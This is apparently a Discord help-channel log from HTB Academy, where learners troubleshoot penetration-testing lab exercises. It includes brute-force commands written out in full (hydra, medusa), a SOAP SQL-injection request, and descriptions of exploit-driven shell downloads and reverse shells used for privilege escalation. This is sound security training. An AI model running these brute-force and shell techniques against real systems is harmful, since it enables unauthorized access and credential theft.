#modules
from what i know, i dont think you can specify multiple hashing algorithms from a text file
all hashes in the file must be from the same algorithm
Oh so the file that I got from HTB would be all one algo then?
what module, what section?
Week 6, Cracking Passwords with Hashcat, Skills Assessment Hashcat last question
yes, all password hashes in that file are from the same algorithm
ahh I see makes more sense now
Hello, how can I answer the questions without Pwnbox?
use ur own VM and connect using the OVPN file
what would be the input needed for me to grep the most common password? after I crack all the passwords in a file
Okay
going through the content I see EternalBlue (MS17-010) is still in the material. how likely is it to ever be seen in an engagement? or is it largely used by trainers because it is so easy to replicate? just curiosity
u can either use a python or bash script to give u the count of each word/password
it would be like 3-5 lines thats it
try to do the module that way. it won't work. why are you giving bad advice?
from the documentation
from the module
@autumn pilot tell me you haven't done the module w/o telling me you haven't done the module
hes not giving bad advice, you need to understand that the shellcode ur replacing in the msfvenom payload is what will get executed, so technically it doesnt matter the port number u specify
because as i said, the way it's written it doesn't work
DUDE, you are about to be surprised lol
lol am i
so are you.
i know why bishop fox don't use htb as a training platform anymore and make their CTF in house now. the same ppl who author sliver
let's rap. why does the module have instructions which are not aligned with the official documentation?
💀
aren't you noticing any difference in the two msfvenom commands?
No wonder you leave the server now and then.
i only come here to bring issues to attention
but it seems like when i do i get these responses like it doesn't matter? we dont care?
also, im not gonna wait lemme surprise u from now, you might want to take a look at the author's name 😉
try to joke, i will report idc 😄
report for?
anyway, let's keep the topic and try to help u here
well i am doing that module to talk about with a guy named joe later on when i'm done
i come here to tell you about the documentation vs the module and u wanna act like this. idc
Just a small port difference.
bro it doesnt matter
which one can change by themselves.
read this
the C# format used in the module, will produce an asp code, which later u will replace, so whatever port u use there, it doesnt matter
💀
why when i try with that other port it doesn't work?
as soon as i change to the documentation? works
scenario in the documentation is slightly different from the one in the module as i remember
maybe u had another thing wrong back then who knows
¯\_(ツ)_/¯
tell me you didn't see the module author without telling me you didn't see it
no one said that, we are trying to help you, but ur being aggressive and sarcastic, what can we do? 😄
good the module author can read it themselves
He wrote it
doesn't need to read it again.
the module doesn't work out of the box
¯\_(ツ)_/¯
maybe it was just broken the first time and changing the ports was useless but it seemed to fix the problem for me when i did it.
yeah, if only i had enough modules done in the academy and on there to make comparisons i could try harder and learn more better, right
why so mad?, enjoy the learning buddy.
i am ty. the academy is so good 🙂
report any issues with modules in #1234357888114364508
Keep going. you got this.
What wifi adapter do you recommend that support monitor mode and packet injection?
maybe better asked in #hardware-iot-ics
I am working on "Firewall and IDS/IPS Evasion - Medium Lab". My thought process is leading towards spoofing an IP on the same subnet, but that has not worked. I've tried multiple other methods of bypassing the firewall filter and some out of the box techniques and nothing. Any thoughts or ideas would be appreciated. Thank you.
what i see suggested often for the Medium and Hard labs is to use Pwnbox
ah
Need help with an example for Information technology foundations - Linux fundamentals - regular expressions. No module just using the practice regex exercises. Exercise is search for all lines that contain a word that starts with permit. (From /etc/ssh/sshd_config file)
Er Mah Gurd I've been banging my face against the keyboard this long and that's why it wasn't working?!!!! AAAHHH I even set a route on my Kali box and it didn't work but I think it was the wrong mask. Either way, thanks so much!
Hey guys, I have a little question. I'm doing the password cracking module and now I'm at the Pass the Ticket on Linux section. I want to know, like, the system of using mimikatz etc. to have access to certain shares is pretty easy, but what I want to know is: when the importing of the ticket is ok and we navigate like the command dir \DC02.inblanefreight.htb\c$, how do we know that it's DC02 or DC01 or idk LINUX01? Is it like the workstation name??
Its DNS record? You've got a lot in there about mimikatz and passwords, but you're asking about the host in a domain?
real stupid question: there's an intro to C# module, but what for? i've never seen anything about C# being useful in infosec
C# is highly used for windows exploit development
ah ok yeah that makes sense
Machine has been spawning for almost 10 min. Are we having issues?
this is the AD Attack module.
ctrl+shift+r and try again
Thanks, let me try ...
I am on a Mac. That just put everything in "reading" mode.
But I did refresh the page anyway.
And still the same...
try hard refreshing instead
how
logoff?
from HTB?
seems it's something with that section. I clicked next and the server spawned fine. I clicked back. Then the spawning thing is available. Clicked to start the victim but same, again...
Try starting another machine
Yeah, just did
it worked on next section.
let me do that again
Seems to be working now, finally ...
it was a browser issue
anyone on that can help with previous question?
chatgpt is great for stuff like that
I tried it but gave me grep command and one for awk
so tell it not to use those if you don't want it to
Hi
Just wanted to know someone else command would look like. If they were asked the same question. Because there was no way I could have answered it without gpt
what's wrong with awk/sed
Nothing. That’s what the previous lesson was about and using regex to find the answer. So I used grep and awk with no success on my knowledge then used gpt to find the answer but I was confused how it came up with that answer.
Oh ok I did not know that. Let me try that out.
What operating systems do you people use? Or it’s just vm
VM running whatever. i have a Parrot and Windows 10 VM
I use parrot os but as a solid operator with windows dual boot, it’s hard to find guides or mentors on how to hack or do much since parrot os is new
it shouldn't really matter which distro you use because in the end, you're running Linux
the most popular distros people use for pentesting are Kali, Parrot, and Arch
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
you can have a look at this article to get an idea of where to start
I tried Kali but I’m not big on like hacking others and stuff I been learning mostly on defense and finding ways how to use it efficiently, parrot os comes with a lot of applications but hard to find guides on how to use it on the other hand Kali Linux been around for years and has about anything you need to find
Hey guys, im doing the Pivoting, Tunneling and Port Forwarding skills assessment, i did everything A-OK to the moment till the last machine, here's my advances and finally the problem:
||I used the webshell given to obtain user-access to the first machine, opened a socks5 server using ssh, SSH'd straight to second box using creds found in the first machine.
In the second machine, while using SSH, I opened a second socks5 server and used RDP to connect to the third machine.
In the third machine I had to do a ping sweep to find the last machine, the Domain Controller. I'm supposed to use the same credentials that I found in the last machine I think, maybe not, but either way it doesn't matter since I cannot even connect to the DC, the firewall seems to be blocking the connection and I dunno why.
I would use another machine to see if it does allow me to connect from that machine IF there was another one, there isn't.
I used nmap to see if maybe the DC RDP service was listening on a different port and then the SMB ports came open, that gave me the idea of using that service to get the last flag and it worked flawlessly, now I'm wondering: Was I supposed to complete it that way or did I cheat somehow? I wanna complete it the right way since the idea here is to learn and apply what I've learnt so far.||
Getting the flag is getting the flag if you used code then it shouldn’t be considered cheating it’s unfair if you use gpt or something that generates the code for you
if you're using Linux for defense then maybe look into something like SANS SIFT Workstation or Remnux
Im just trying to learn how to better defenses and if something snags a trap can hunt it down you know, not trying to be a fbi or cia hacker just want to dedicate to stopping people from doing something
then you should probably look at HTB CDSA
How do I get Medusa to switch ports? This exercise I'm on requires me to gain ssh credentials by attacking FTP however I can't obtain the username and password because ftp on this exercise runs through a port other than 21
Ethical Hacking 1 > Week 6 > Attacking Common Services > Attacking FTP
It's windows, there are many ways to get a flag on it, I used rdp when I did it. If you were able to reach the last machine I'd say you successfully pivoted.
how did you manage to bypass the firewall?
thats what i cant figure out
this cert focuses on SOC analyst processes, including detection and threat hunting. you can choose whether to do the exam or not, but the content is good regardless
well first of all you're using RDP 
Hey everyone! I’m new to HTB and I was wondering if I should learn Linux fundamentals before the introduction to networking module?
both are a good start, pick which one sounds cooler to you
The port is open, you just connect to it like you did over smb ...?
i don't get it, the last windows machine and DC dont have SSH service running so thats the way i could get access to it
Windows doesn't typically use SSH for remote management
that would be what WinRM is for
the DC blocks the connection as if it the port was closed
thats because the machine you're trying to reach it from is not part of the remote computers group
got no more machines to jump to
it can't RDP because its not in the list of computers that can 🙂
doesn't mean you can't talk to the DC over another port/protocol
still I'm confused, how did you manage to RDP to it?
Oops, was looking at the wrong flag, I used smb >.<'
been banging my head over that for a while but i guess i did it then
what is wrong with pwnbox
its been 2 days
there is already me procrastinating, now this.
nothing? https://status.hackthebox.com/
change the server
did anyone else have problems with the sliver c2 module where generate stager hangs?
when i had check ps -aux, it shows it was generating with msfvenom and ruby so i had fixed the bundler and i'm able to generate with msfvenom now which would indicate it was the metasploit install, after fixing that its still hanging i also had checked google which led to an issue back in march that was fixed on this however, it appears that i'm still having that issue. wondering if anyone resolved this issue
or even encountered it
-n , its in the help page
Hey
well if anyone runs into the same trouble i had with that module you have to use binaries and generate it from the server part not the client
it's module of Nmap Scripting Engine and I'm somewhere stuck at following question.
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.
I use NSE scripts on port 80 and 31337. Both are webserver running on host but didn't find any flag.
look at the result of scans u got, and then examine them, you wont get the flag directly
delete it to avoid spoilers pls 😅
and yes thats not the correct flag for the NSE section, search somewhere else
Can you please help which port should I focused on?
i will tell u in DM to not spoil others
ok. Will DM you.
Hey, I'm stuck on the Windows priv esc Vulnerable Services section. I'm at a point where I have downloaded a shell.ps1 script to get a reverse shell into the target Windows system, following the steps mentioned in this section, but I can't find the shell.ps1 script to run it now
wym cant find the script
Ah
There was a Druva inSync exploit in the target Windows VM that I modified to download shell.ps1, which was in my attacker Pwnbox
I executed druva.ps1 and that shell.ps1 got downloaded into the target windows but i dont see it anywhere to execute it
its executed in memory
Also it says execute the poc script on target host seting up a netcat listener on our pwn box
After modifying the PowerShell execution policy with the command Set-ExecutionPolicy Bypass -Scope Process
I try to run that command but gets an error
?
I'm trying to do the Nessus Skills Assessment, but keep getting the same error even respawning the target multiple times. Am I missing something?
try unrestricted
hello, where is the open button in fatty-client in [ Exploiting Web Vulnerabilities in Thick-Client Applications ]
what error?
I could also use some help with understanding: nmap smtp-user-enum where in examples I follow that use nmap --script smtp-user-enum -M VRFY -U <path-to-list> I get an error with: Argument to -M must be at least 1!
in the screenshot, it just won't allow me to connect and says theres nothing i can do about it lol
as I am trying to complete the footprinting module without using Metasploit
@wicked solstice did you click advanced and continue?
oh lmao i had to scroll down some more to see continue
```
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
```
I get this error on Ubuntu pivot host I can't fix it I need help
Hey guys, I'm fairly stuck on the Web Service & API Attacks - Skills Assessment. I looked around here to check what other members have found out, but I can't get the server to properly answer me. My PoC looks like what's below, but as stated in the exam, "Without the proper payload it'll hang or throw an error", which prevents me from using Burp Suite Intruder or ffuf or sqlmap to try to get a payload to work. Is there any other way? I also tried to use the Python script that's been given in the course (client_soapaction_spoofing.py) and tweaking it a little bit, but it's the same problem. Could anyone guide me on that?
||```HTTP
POST /wsdl HTTP/1.1
Host: 10.129.241.201:3002
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
SOAPAction: Login
Content-Length: 512

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:tns="http://tempuri.org/"
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
<soap:Body>
<tns:LoginRequest xmlns="http://tempuri.org/">
<username>
SELECT+*+FROM+users
</username>
<password>
SELECT+*+FROM+users</password>
</tns:LoginRequest>
</soap:Body>
</soap:Envelope>
```||
hello @jaunty depot
You can DM
Hey
Hello - I am somewhat new to htb. I'm wondering if there are any Academy modules that are more focused on SCADA/PLCs? I know it's discussed in some of the Networking modules, wondering if there is something where the bulk content is centered around Industrial testing/security?
There is a new pro labs that is centered around ICS. I don't think there are any related modules in the academy yet.
Hello, I am working on Attacking Common Services > Attacking FTP
I have answered the first question about the port on which ftp is running, and to answer the second I used hydra (I have just finished the password attacks module so I'm comfortable with it) to brute force the login and passwords using the provided lists. Here's the full command :
`hydra -L ../resources/users.list -P ../resources/pws.list ftp://10.129.203.6:2121 -t 16 -o hydra_results.txt`
And it found only one pair of credentials : j****n:3****h. Discord told me that the expected username was r****n even though I didn't find any matching password for that username.
Now I'm running hydra with only username r****n and yet no result. How can I find the associated password?
can you link us to the section? i think i might've done that one
@dvr ^
@fading olive ^ ^
where did you obtain the users.list and passwords.list?
From the resources tab of the module Attacking Common Services
FTP stands for file transfer protocol. who knows what files are in that server.
hey seems like i didnt do that one yet, sorry cant be more help
I tried accessing the server, I ran nmap with the ftp-anon script but it didn't yield anything, and when I try to connect using the credentials I found it says "connection refused", whenever I run :
ftp -p ip_address port
It says connection refused
ftp user@ip ?
It says Name or service not known
ftp://10.129.203.6:2121 this is your known ip?
I've restarted my vpn and reset the machine several times but it keeps erroring
You might wanna take a look online about FTP anonymous login. You have used the wrong login format.
er... your known ftp server?
hi! I was reading the Types of Databases section of the SQL Injection Fundamentals module and it says "NoSQL injections will be covered in a later module."
What module is it? Is it even included in the CPTS exam?
I restarted since but it was yes
Okay I've done it already but I may have missed something
yes please because I don't see what's wrong with my commands
quick sanity check, if someone wouldnt mind... when viewing HTTP traffic on a webserver from inside the network, we would never see its LAN address in the host header right? we /should/ see its public facing IP?
my assumption leads me to believe this though admittedly ive never done this kinda traffic analysis before to know whether thats the case...
and the module info has me questioning myself
Yes, you're correct. When you're inside a network and monitoring HTTP traffic, the Host header typically reflects what the client is requesting. The Host header would show the public-facing IP address or domain name of the webserver.
However, for internal clients accessing the webserver directly within the LAN, it depends on how the request is made
If the internal client accesses the webserver using its LAN address, the Host header might show the internal IP (e.g., 192.168.x.x).
oh right.
If the internal client uses the server’s public IP or domain name, then the Host header will reflect the public-facing IP or domain name, as it would for external clients.
if you want to verify that
Hello, sorry to disturb you, that's my first time here, and my first time asking for help for HTB. I'm following the 'Basic Toolset' path, and actually am on the Login Brute Forcing module. But I'm blocked on a question that I don't know at all how to resolve. Can you help me pls :(
Internal request: If a client within the same LAN accesses the webserver using the server's private (LAN) IP address, the Host header in the HTTP request will reflect that private IP (e.g., Host: x.x.x.x).
External request: If a client is accessing the webserver via its public-facing domain or IP, whether internally or externally, the Host header will reflect that (e.g., Host: example.com or Host: x.x.x.x).
the section describes attackers using 127.0.0.1 and/or admin as a header to get access not normally accessible... im failing to see what they're talking about.... any idea? dir listing/enum type stuff? failing to see how that could be ultimate useful in some big or small way.
sorry i have lost my god power i don't know from which module you are asking and whats the question is?
Its not a question, just a small tidbit of info that mentions a method of attack but not what its useful for.
Its located here:
https://academy.hackthebox.com/module/229/section/2464
not you bro
but let me check
the module is "login brute forcing" and the question is : What was the password for the ftpuser?
@somber fiber here's the screens
😭
ah, no biggie.
but let me check
there is way to bruteforce ftp login
try that it might help you
plead to the google god.
i'm trying
as it's running in a local env, the admin must have set it as DNS without any ".com, .htb", which will refer there.
will i get cubes from completing t2 modules after purchasing student plan?
Yes
alr thanks
hydra and medusa don't work :(
New to Academy? Looking for more information? Learn about HTB Academy, the Cubes system, and the platform structure here.
Click the link above, it’ll show how much you get back per tier 😄
Makes you able to save for a higher tier module
y thats what i wanted to know, i thought you could only do tier 2
You can do up to tier 2 modules, without using cubes, if you want a tier3 module, you will have to use the cubes you earned by doing the other modules
I'm doing the traffic analysis section: https://academy.hackthebox.com/module/229/section/2464
and on HTTP 400s (smuggling) and im wondering if this were real world, and the server was vuln to smuggling, we should see the smuggle:
(decoded):
```
GET /login.php?id=1 HTTP/1.1
Host: 192.168.10.5
GET /uploads/cmd2.php HTTP/1.1
Host: 127.0.0.1:8080
HTTP/1.1
```
first as a 400, then a 200 for each request right? Im not seeing that in the wireshark traffic
I do see GETs for /login.php... but i do not see a log for the /uploads/... request, either as its own log entry or as a secondary request nested in the /login.php ... the info im reading on http req smuggling suggests that the request should in fact be listed as a 200 somewhere
Please drop the command you are running and what output/error you are getting.
```
[eu-academy-5]─[10.10.15.31]─[htb-ac-1201594@htb-i22f36prnr]─[~]
└──╼ [★]$ medusa -h 94.237.57.90 -u ftpuser -P /opt/useful/seclists/Passwords/2020-200_most_used_passwords.txt -M ftp -t 5
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
NOTICE: ftp.mod: failed to connect, port 21 was not open on 94.237.57.90
```
are you using pwnbox or your own vm?
pwnbox
i tried with my kali but same thing
and the question is: What was the password for the ftpuser? I already looked 10 times at the explanation on the page, no password ...
Perhaps the service is not running on the default port
yeah, here it is
```
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
25/tcp    filtered smtp
111/tcp   open     rpcbind 2-4 (RPC #100000)
50006/tcp open     http    nginx 1.26.1
```
there is no ftp
same pinch
have you tried cracking the ssh
or with rpcbind
Use the provided port in the target when you spawned it
ssh yes but not rpcbind
got nothing in ssh?
```
medusa -h 94.237.57.90 -u sshuser -P /opt/useful/seclists/Passwords/2020-200_most_used_passwords.txt -M ssh -t 5
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: picture1 (1 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: 123456 (2 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: 12345678 (3 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: 123456789 (4 of 197 complete)
ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 94.237.57.90 (1 of 1, 0 complete) User: sshuser (1 of 1, 0 complete) Password: password (5 of 197 complete)
```
i don't think I have to do that BUT the next question is "After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?"
to crack the ftp?
maybe the ftpuser exists but no ftp service is running on the box: ie just crack the pass?
i can't do it without write a user
so in the nmap i have the port 50006 http, but i have only a page with : Welcome to inlanefreight.htb
There is a typo in one of the recent modules. The switch to specific the application is -a and not -n
try dirsearch
?
right
instead of a url try this: ftp://IP
in browse
literally like that: ftp://94.237.57.90 ?
yes
doesn't work, that gives me a Google page
This is a public IP address (Docker container). A port has been defined in the target. Only this one port is relevant for you
add port
i got the binary fuzzing module to talk about with my fuzzing friends
if anyone wanna do it with me later hmu
which one? 50006
The port specified under Target.
IP:PORT
bro shooting gun from our shoulders.
I'm doing the AEN and I run proxychains GetUserSPNs.py, but after I run it, it says connection timed out. Some help please.
I will try
Have you tried syncing your clock with the dc?
The AEN module is structured like a walkthrough. Have a look at the module to see how to proceed.
i will try it
I know but there is nothing to help with this issue
Now I cannot set up the correct time, the clock skew is too great
then sync ur clock w the dc
use ntpdate
im getting no eligible servers
u sure thats the DC ur syncing w ?
the dc is x.x.x.3?
yes
im trying ntpdate IP but no eligible servers
weird, try resetting, i dont remember any problems with the DC in that module
could be connected with my proxychains conf?
ur reaching the DC via proxychains anyway right?
so when u use ntpdate, im assuming ur adding proxychains before the command, right?
yup
u are, right?
```
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
ntpdig: no eligible servers
```
yes
weird tbh, tried resetting?
didnt want to but gonna reset
Proxychains4 does not support UDP https://www.kali.org/tools/proxychains-ng/
can someone give me code for a microsoft fishing website
huh? 🙂
phishing
u want a phishing website? 🙂
its for school
i doubt we can help with that here :/
why
cuz no one knows what you will do with that website. also, let's stop talking in this channel and keep it related to Academy modules
what channel would i talk in
i dont have permission to use it
You can only read there to see how you can verify your user
I tried using tsocks but didnt work
is there any way to gain the cubes for free?
Until all module content is updated, I strongly recommend adding alias crackmapexec='nxc' to your .bashrc file. Will make the process of going through the modules that much easier.
Just type nxc lol
stop copy paste , write the command yourself
in the sql injection fundamentals module.. in the SQL Operators section....i did this module maybe 2 years ago and i cannot get the right answer. there is only XXX rows in the titles table, and the answer i inputed long ago has 6 digits. can someone confirm that the answer has either 3 or 6 digits? in private if its too much spoilers
Yes, it is 3 digits. You have the right answer which you may want to consider censoring or whacking.
Yeah that happens when they update a module, all your answers get really messed up.
delete that please, it has an answer 😄
a wrong answer
at this point it can act as a troll 😆
It does make it difficult to go back through and figure out what content you need to go through again.
they updated the module i assume
im glad its only the sql injection module ive mastered that already for my oscp exam 😆
still going to go through the module though
how do we restart these VMs?
theres a button right next the ip address
Why cant i talk in general 😦
Then it doesnt require a box
read #welcome
if you click terminate, and then click on spawn, you will effectively restart the VM
alright
it will generate another IP too
MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
What is the format for question 2? is it Domain\Account?
first.last
can I DM really quickly?
sure
read the question
guys, I am stuck at forever spawning a target. I already logged off and log in again, but no changes.
what module?
AD Enum / LOTL
you're right, thank you very much
hope it worked
#modules I am working on module 19, section 119, Network Enumeration With Nmap.
Firewall and IDS/IPS Evasion - Hard Lab.
The question is this: 'Now our client wants to know if it is possible to find out the version of the running services. Identify the version of the service our client was talking about and submit the flag as the answer.'
Has anyone done this already? I'm stuck here and can't move forward. I've tried everything I know. Could you kindly point me in the right direction? 😟
sorry, not sure if this is the right channel as i don't need help with a module but just had a question with something i read on one. "To be able to track how our sent packets are handled, we deactivate the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping) again." why do i need to disable icmp, dns and arp to track sent packets?
yep, took a few minutes but finally spawned, cheers
Week6 Ethical Hacking 1 > Attacking Common Services > Attacking SMB
I am on the last question that requires you to SSH into the target but I continually run into this issue where I do not get a chance to enter the password and am instead kicked out because I have a "publickey"
This is the only module I run into this issue on, every other module let's me enter a password when I clarify a user
let's say if our target host was only responding to queries made from certain protocols which protocol would you think that be?
is HTB academy a good way in getting into cybersecurity & pentesting?
it depends on you. If your aim is to actually bang your head against a wall saying to yourself "why did I not think of this earlier?" then definitely.
but yes it's a good platform
It's perhaps a good way of learning and practicing the technical side of it security which can help you get into it... probably a lot of other factors weigh more heavily on whether or not you reach the end result that you want.
It'll definitely acclimate you to the frustrations, as KahnMarshal puts it so eloquently.... or swiftly usher you toward a different career path.
hey you can't blame me I just completed pass attacks module
I'm preparing him for what's waiting for him
I want to see if once I learn the basics more or less it will be as I expect it to be, possibly make a future out of it haha
We've all been there. Hours-wasted-on-a-typo sort of day lol
Sounds like you're in the right place then.
I am used to the frustrations, however much I want to quit, I'll still stick to it one way or another
start with the information security path
Mind if I share a screenshot?
you have no idea how much I hated the pivoting module hehe
You don't need to give it a port btw.
that's just an old habit
Oh
@shell ore have you done this module?
screenshot?
@sacred jacinth The most likely protocol for the service in question is HTTP. I found the version, but this doesn't help me find the flag
just saw ur message
ok so u access the share right?
since ur stuck on the last question, i assume u got his password right?
yes, obtained everything, it's just the ssh thing is stopping me
the error ur getting in ssh, means that the authentication method allowed is only via private and public keys, passwords arent allowed
if our target host had an associated URL/FQDN and we wanted to resolve it which protocol would that be? and that protocol should have a port what if we mimic the request as that protocol?
lemme try smth rq, to see if i remember the module correctly, 1 sec
ok, it doesn't look like the rest of the module covers keys tho
ok so, have u tried connecting to the SMB service?
smbclient or smbwalk?
i remember there was quite a bit of talk abt ssh keys somewhere in the module or previous ones
normal smbclient
see what shares there are, what info on them
I think you're confusing smb with snmp
lemme go see rq, I've been working on this problem for days now so my memory is a little hazy on how I got where I got
i thought the same, but then i was like: maybe there is smth called smbwalk whatever 
its okay, stay relaxed and recheck ur stuff
sweats profusely
got this
don't post screenshots
connect and see what u can do
trying not to
i dont believe there are any spoilers there so its okay 😅
but if u prefer, then delete it, better safe than sorry i guess
mr goblin gets angry but idk
ahaa
can we DM?
sure
Hi, when I attempt to discover the nameservers of the infreightlane.htb domain in DNS Zone Transfers module of the Information Gathering Web Edition in the penetration tester job path I get nothing back from the dig command that I could leverage to execute zone transfer. I'm using pwnbox.
@shell ore next time SMB into SSH to get the creds.
well the secondary dns that you are trying to zone transfer to is perhaps not supposed to return anything? how about you try a different secondary dns?
I need help with the "login bruteforcing" module I am on the "Login Forms" section and am using this exact command to bruteforce the login but its not working. hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 55886 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials". Please tell me what I am doing wrong I don't understand at this point.
Got an issue with XSS session hijacking. I can get a response from the site but the cookie value is empty for the admin. I have tested this on my own side and it returns my cookie value. I have tried generating a cookie by supplying the login url to the admin before the xss payload. Any ideas on the issue? Thanks
I'm not sure what I'm doing wrong. No command is showing me any nameservers for me to leverage into zone transfer. I can send the commands over if that would help.
Do I have to pay in order to practice HTB?
send me the commands
Need to see the payload
if im using a VPN file to connect my own VM to the HTB VPN do i need to grab a new file every time i want to connect? i was able to connect just fine the first time yesterday but now im trying again and it doesnt appear to be working
Only if you change regions
HTB Labs? Not all machines. Only for the retired.
im running the vpn and im getting the "Initialization Sequence Completed" but it seems like it keeps trying to reconnect? i dont recall the first time the console i was connecting to constantly logging stuff
Can you connect to machines?
@sacred jacinth I give up, I’ve spent two days on this exercise and I can’t solve it. Thank you for the help.
get in my dms
like with pwnbox? yeah can connect just fine and ping/nmap my target ip just fine as well
I am having issues with Footprinting lab medium. I believe I need to access MSSQL using the Microsoft SQL Server Management Studio. When I try to authenticate I get the following error:
TITLE: Connect to Server
------------------------------
Cannot connect to WINMEDIUM.
------------------------------
ADDITIONAL INFORMATION:
A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (Microsoft SQL Server, Error: 233)
For help, click: https://docs.microsoft.com/sql/relational-databases/errors-events/mssqlserver-233-database-engine-error
------------------------------
No process is on the other end of the pipe
------------------------------
BUTTONS:
OK
------------------------------
Am I doing something wrong or is there an issue with the lab?
With your own vm
Is this from rdp?
Yes
with my own vm when i attempt nmap <targetip> it just says host seems down
-Pn
Maybe try those creds on another user
Will do, thanks.
Thanks, yea I saw that. I just don't have the VIP access so trying to exhaust what I have access in HTB-A for the time. Thanks again.
Also FYI prolabs is not included in the VIP access. Its a separate sub.
I need help with the "login bruteforcing" module I am on the "Login Forms" section and am using this exact command to bruteforce the login but its not working. hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 55886 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials". Please tell me what I am doing wrong I don't understand at this point. This is the form I am bruteforcing
```html
<form method="POST">
<h2>Login</h2>
<label for="username">Username:</label>
<input type="text" id="username" name="username">
<label for="password">Password:</label>
<input type="password" id="password" name="password">
<input type="submit" value="Login">
<p class="error">Invalid credentials</p>
</form>
```
hello guys
any good samaritan who can throw me some light on Nibbles - Privilege Escalation module?
monitor.sh does not work as intended once I modify it to open a reverse shell on my attacker machine with root privileges
You need to specify the full path
it keeps asking to introduce a password which shouldn't be the case as the file can be run with root privileges
Specify the full path
DAMMM!!!
thank you very much
what is the reason for that? I am already located on the directory where the file is
you could make another file called monitor.sh, it's not the same as the one specified in sudo -l
got ya
thx
Hey everyone
Sorry this is random
I’m looking for a team for the hack the boo practice and competition
But I can’t find any here
I wanted to post it on the general channel, but it kept directing me here
so we can connect to smb/ftp using smbclient and ftp, and once there we can view files and retrieve them. but on the actual target machine where are the files used for smb and ftp being stored?
Please i need team members for the CTF boo competition
create a post in #1225791307256168448
Okay thanks 😊
Have to be on the machine to find that out
Usually just a folder
while going through modules when on machines for exploration purposes is it good to look to see if you can get to root? more just for POC and to test yourself?
not particularly, this is better for boxes. (after finding root you try a diff way to get root, or user w/e). to my understanding most academy boxes are set up to do just the lab involved and have been hardened to other attacks, taking over the machine would be a liability on the network
hmmm... fair enough, I found a really easy root using a sudo -l so it was just exploring but fair enough, I know there are ROE when doing actual testing I just thought it was cool to string things together
Need help on Local File Inclusion SA
I am at the end nearly, the only problem being I cant access my payload although I read the source code
mind linking so i can confirm its the one ive done? i think i have a nudge for you
this is "normal" just up arrow and reconnect.
yeah ive done this one wanna DM me where you're at and what you've tried so far?
Sure
no its just like lag or something? it comes and goes, keep retrying
hmm, usually for me its just rdp no issues SCP or ssh or whatever, have you reset?
target and pwnbox
Have you tried using remmina?
I never had any issues there are also some flags in xfreerdp you can apply to help you if you scroll up they are in here somewhere or use the man page
I’m pretty sure there’s a /auto-reconnect flag you can put on and there is one for timeouts too but I don’t know them off the top of my head I just tend to use remmina but it’s a gui but as long as it’s done I don’t care 😂
I don't know the situation with the box you were on, but sudoers entries match on the start of a string and that can be a reason. Other times if you're exploiting something, the account that runs the binary may not have the environmental variables you expect (i.e. PATH). Maybe other reasons too, but at any rate full paths are usually something you should try.
usually entries in sudoers will have the absolute path to the file. if it's a relative path, that's an issue
Which vm software should I use?
While I managed to pass the skill assessment lab for the Pivoting, Tunneling, and Port Forwarding module i have a question (SPOILER AHEAD)
||While doing dynamic port forwarding using ssh -D 9050 or using the solution provided (metasploit) my nmap (same as in the solution) ends up showing this:
proxychains nmap 172.16.5.35 -Pn -sT 53/tcp open domain syn-ack 113/tcp closed ident conn-refused 2000/tcp open cisco-sccp syn-ack 5060/tcp open sip syn-ack
However in the solution I am meant to have something similar to this:
proxychains nmap 172.16.5.35 -Pn -sT 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server
Any idea why that might happen?||
Week 6 > Attacking Common Services > Attacking Email Services
